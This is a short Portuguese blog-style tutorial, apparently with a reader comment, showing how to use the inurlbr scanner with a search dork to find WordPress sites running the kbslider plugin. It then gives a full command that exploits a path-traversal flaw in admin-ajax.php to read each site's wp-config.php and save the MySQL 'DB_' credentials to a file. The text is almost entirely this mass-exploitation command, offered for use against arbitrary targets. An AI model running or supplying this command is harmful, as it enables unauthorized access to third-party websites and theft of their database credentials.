Bom vamos la
[0x02] Explorando com o Scanner inurlbr
Dork Index of /wp-content/plugins/kbslider
Comando
"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "
Resultado e novamente lhe retornara o wp-config.php contendo as infos do mysql do alvo
comando nao pegou
ResponderExcluir